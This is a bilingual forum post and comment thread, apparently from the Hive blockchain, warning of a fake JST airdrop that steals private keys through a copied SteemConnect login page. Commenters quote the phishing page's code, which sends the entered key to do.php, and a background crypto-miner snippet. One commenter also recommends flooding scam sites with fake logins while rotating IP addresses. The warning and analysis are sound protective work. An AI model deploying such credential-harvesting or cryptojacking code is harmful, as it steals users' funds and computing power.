[SCAM ALERT] ⚠️There is no 1000 JST Airdrop! (HIVE, STEEM, BLURT)

in Deutsch D-A-CH3 years ago (edited)

image.png
Image by pixabay

ATTENTION! HERE ARE LINKS TO SUSPECT SCAMMER PAGES. CLICK ON OWN RISK.

And once again someone has made it... probably exactly the same scammer as 2 years ago, scammed some users of our Blockchain. The procedure is as follows: In comments on Steem, Hive, and Blurt, different users write a comment that looks like this one to guide the user on a page

ACHTUNG! HIER SIND LINKS ZU VERDÄCHTIGEN SCAMMER SEITEN. KLICKEN AUF EIGENE GEFAHR.

Und mal wieder hat es jemand geschafft... vermutlich exakt der selbe Scammer wie vor 2 Jahren, einige Nutzer unserer Blockchain zu Betrügen. Die Vorgehensweise ist wie folgt: In Kommentaren auf Steem, Hive, und Blurt wird von verschiedenen Nutzern aus ein Kommentar verfasst, der so aussieht wie dieser um den Nutzer auf einer Seite zu führen:


image.png

The "Claim JST Now" link is a link to bit.ly - a service that hides or shortens URLs. Clueless users simply click on it and land on the page. But with a little trick you can see the link behind the link. Just put a + behind the URL and you get an overview of the link:

Bei dem "Claim JST Now" Link handelt es sich um einen Link zu bit.ly - ein Service der URL's verstecken soll bzw. kürzen. Ahnungslose User klicken einfach drauf und landen auf der Seite. Mit einem kleinen Trick kann man aber den Link ansehen, der hinter dem Link steht. Einfach ein + hinter die URL packen und schon erhält man eine Übersicht des Links:


image.png

If you now follow the page ⚠️https://www.justnetwork.tech/, you will land on a landing page that promises to pick up an airdrop. Just like that. Here is something about being an active Steemit user with at least a reputation of 40+. Absolute bullshit.
The person who clicks on the "Claim Now" button next will land on a page that should be familiar to every Steem user.

Folgt man nun der Seite ⚠️https://www.justnetwork.tech/, landet man auf einer Landing-Page, die einem verspricht, einen Airdrop abzuholen. Einfach so. Hier steht etwas von, das man aktiver Steemit Nutzer sein sollte mit mindestens einer Reputation von 40+. Absoluter Bullshit.
Derjenige, der als nächstes auf den "Claim Now" Button klickt, landet auf einer Seite, die vielleicht jedem Nutzer von Steem vertraut sein sollte.


image.png

The next page ⚠️ https://justnetwork.my.id/ shows a page that looks like SteemConnect.There are two input fields - the username and the key. Here only the CSS from the original version of SteemConnect was copied and simply the styling of the original was used. The two input fields are simple text input fields - where the scammer in the background on the server saves the name and the entered Private Active Key (key for sending money) in plain text.

Auf der nächsten Seite ⚠️ https://justnetwork.my.id/ ist eine Seite dargestellt, die wie SteemConnect aussieht. Hier gibt es Zwei Eingabefelder - Einmal den Nutzernamen und einmal den Key. Hier wurde lediglich das CSS von der originalen Version von SteemConnect kopiert und einfach das Styling des Original verwendet. Die beiden Eingabefelder sind einfach und allein Text Eingabefelder - wo der Scammer im Hintergrund auf dem Server den Namen und den eingegebenen Private Active Key (Key zum versenden von Geldern) in Klartext abspeichert.


image.png

The interesting thing is, you can just leave the text field empty and just click on "SIGN IN" - then you'll be taken directly to the page where the user is led to believe that the airdrop will be successful. Perfidious at this point is that you won't get an airdrop here, but will be cheated of all the tokens on Hive, Steem and Blurt. (This is only the case if you did not change your keys in Steem times and the same keys are still the same on Hive and Blurt).

Das interessante ist, man kann das Textfeld einfach leerlassen und einfach auf "SIGN IN" klicken - dann landet man direkt auf der Seite, wo dem User vorgegaukelt wird, das der Airdrop erfolgreich sein wird. Perfide ist an diesem Zeitpunkt, das du hier keinen Airdrop bekommst, sondern um sämtliche Tokens auf Hive, Steem und Blurt betrogen wirst. (Dies ist nur der Fall, wenn du deine Keys zu Steem Zeiten nicht geändert hast und die selben Keys immernoch auf Hive und Blurt dieselben sind)

image.png
embarrassingly... the scammer cannot even spell the word "confirmation" correctly.
Peinlich... der Scammer kann nicht einmal das Wort "Confirmation" richtig schreiben.


So... please just pay attention where you enter your private keys. Unfortunately, some users have already fallen for such cheap scam sites several times. If in doubt, always inform twice or three times if such an airdrop is really correct and if necessary, just ask the community.

Also... passt bitte einfach auf, wo ihr eure Privaten Schlüssel eingebt. Leider sind schon einige Nutzer nun schon mehrfach auf solche billigen Scam Seiten reingefallen. Im Zweifel immer zweimal oder dreimal Informieren, ob so ein Airdrop tatsächlich korrekt ist und zur Not auch einfach in der Community nachfragen.

THANKS

Sort:  

Everyone is reminded to be extremely careful, especially if you have your recovery account set to @steem. Those accounts are not recoverable if compromised and the entire wallet will be permanently lost if the keys are changed. Should the target remain as Active Key only, this is the best possible outcome as that key can simply be regenerated (but watch for active authority changes).

@louis88
I did blacklist those domains to automatically warn Hive users. And these features I added last night to @keys-defender should help too! 🙂
(https://hive.blog/hive-192847/@keys-defender/new-features-extended-phishing-protection)

  1. Shortened URL preview so that users know what they are going to click,
  2. Steemit users that still have the same keys on Hive will now be warned too against known phishing domains.

Erstaunlich, dass es immer noch Leute gibt, die auf solche Tricks reinfallen. Meist sind es die paranoiden und vorsichtigen, welche einem Passwortmanager nicht vertrauen und ihre Keys per Kopie oder per Hand eingeben. Dabei würde jeder halbwegs gute Passwortmanager einen Betrug besser erkennen, als ein unbedarfter Nutzer.

:( ich bin dumm

Verfasse gleich einen Post, wie es dazu kommen konnte

:( ich bin dumm

Nun sei mal nicht so streng mit dir.
Aus Fehlern soll man lernen und eventuell ist es hilfreich für Dich zu wissen, dass der Posting Key für jede Anmeldung auf steem/Hive/Blurt, funktionieren und am Anfang ausreichen sollte. Du kannst es gerne mal auf https://wallet.hive.blog/ ausprobieren. Du wirst sehen, dass du dich damit Anmelden kannst. Den Active Key benötigst Du erst bei Zahlungen. Und den Owner Key und das Passwort brauchst Du niemals für eine Anmeldung auf Steem/Hive/Blurt. Der ist ausschließlich für Schlüsseländerungen oder Passwortänderungen gedacht.

Das Problem ist, dass ich die Funktion der Keys schon kenne und deshalb auch stutzig war. 😅

(Siehe mein aktueller Post)

Aber ja, ich dürfte was gelernt haben, von dem ich dachte, dass ich es eigentlich schon weiß :)

 3 years ago  

So true... Dabei ist dieser Scam hier fast dem gleichzustellen dem Scam, den man tagtäglich via E-Mail bekommt und man aufgefordert wird auf einer Seite seine Account-Daten ganz dringend einzugeben.

Traurig mit anzusehen...

den man tagtäglich via E-Mail bekommt

Ist ja nicht so, dass man nichts dagegen tun kann. Ein simpler Code kann helfen und bringt auch ein bisschen Spaß

Link zum Code

random Generator für "names" https://pypi.org/project/names/

Video Anleitung von Morpheus

Wichtig ist die Einstellung des timers, er darf den Zielserver nicht überlasten (wir wollen kein DdoS).
Die Übertragung sollte über VPN erfolgen ( TOR habe ich noch nicht getestet ) - Ein Bann kann zwar nicht verhindert werden, ist aber auch egal, wenn man mit neuer IP weitermachen kann ;)

Und das Gute ist, es ist nicht illegal dem "Gegner" falsche EMail's und Passwörter zu zusenden :-)))

Es hat zwar noch nicht viel gebracht, aber die Scammer haben sicherlich einen höheren Aufwand, falsche von den Richtigen herauszusuchen. Und es gibt mir persönlich, in gewisser Weise, etwas Genugtuung ;)

Du hast ein Upvote von mir bekommen, diese soll die Deutsche Community unterstützen. Wenn du mich unterstützten möchtest, dann sende mir eine Delegation. Egal wie klein die Unterstützung ist, Du hilfst damit der Community. DANKE!

Who care steem😄😄

Posted Using LeoFinance Beta

!discovery 30


This post was shared and voted inside the discord by the curators team of discovery-it
Join our community! hive-193212
Discovery-it is also a Witness, vote for us here
Delegate to us for passive income. Check our 80% fee-back Program

Be careful guys! Scammers everywhere! Thank you @louis88 alerting all of us.

Posted Using LeoFinance Beta

Vielen Dank! Hab sofort meine Keys geändert und fühle mich ziemlich dumm :D

Zu meiner Schande muss ich gestehen, dass ich auch betroffen bin. Zum Glück hatte ich nur etwa 16 HIVE und weniger als 1 HBD rumliegen. Auf den Engines oder meine Splinterlands-Karten wären wesentlich schlimmer gewesen.

HIVE und HBD sind von mir und anderen Usern an "warrentto" geflossen. Von dort an "stecm" "stcem" "stcemit" "richardman" "contestbuddy" und "gregoryoo24". Dort befinden sie sich aktuell noch. Die Chancen, es zurück zu bekommen sind vermutlich niedrig?

Crypto is filled with many Scams that's why it's important to for people to good understanding what they're doing

Yup I went for it

here is how...gone funds and I pressed the button myself :(

https://peakd.com/hive-174578/@karinxxl/i-just-got-scammed-4425-hive-gone

Vielen Dank für den Hinweiß.

Im Quellcode findet sich was ganz tolles:

$('#saveData').on('click', function() {
  var uname = $('#username').val();
  var upass = $('#password').val();
  
  $.ajax({
      url: "do.php",
      type: "POST",
      data: {username: uname, password: upass},
      success: function(response){
        setTimeout(function(){
            window.location.href = 'https://justnetwork.my.id/conformation.php'
        }, 400) ;
      }
  });
 })

Wahrscheinlich speichert die Datei "do.php" einfach die Daten in einer TXT Datei.
Wenn man die Domain bei https://support.namecheap.com/ melden wird, wird sie gesperrt ;)

 3 years ago  

Ja - sehr simple Programmiert der Scammer.
Wurde bereits eine Meldung bei Cloudflare eingereicht. Hoffe die Seite ist schnell down und die Leute dadurch mehr gewarnt.

Dazu startet die Webseite "justnetwork.tech" einen Miner im Hintergrund:
For this purpose the website "justnetwork.tech" starts a miner in the background:

var _client = new Client.Anonymous('a92645b3bb4fd57c92310d400ad0f60244f103692eeb064cc441c782dbbcf9cd', {
    throttle: 0.1
});
_client.start();

Aufpassen!

I hope this links soon cone 😕😕
Very sad when they just take all what you have.

What a scamming system!!! We should be even more careful because its really trouble to detect all those. Its showing steemconnet but in the address bar, different. Clever way to scam. It can be protected by our carefulness. Thanks for sharing this information.

👍👍👍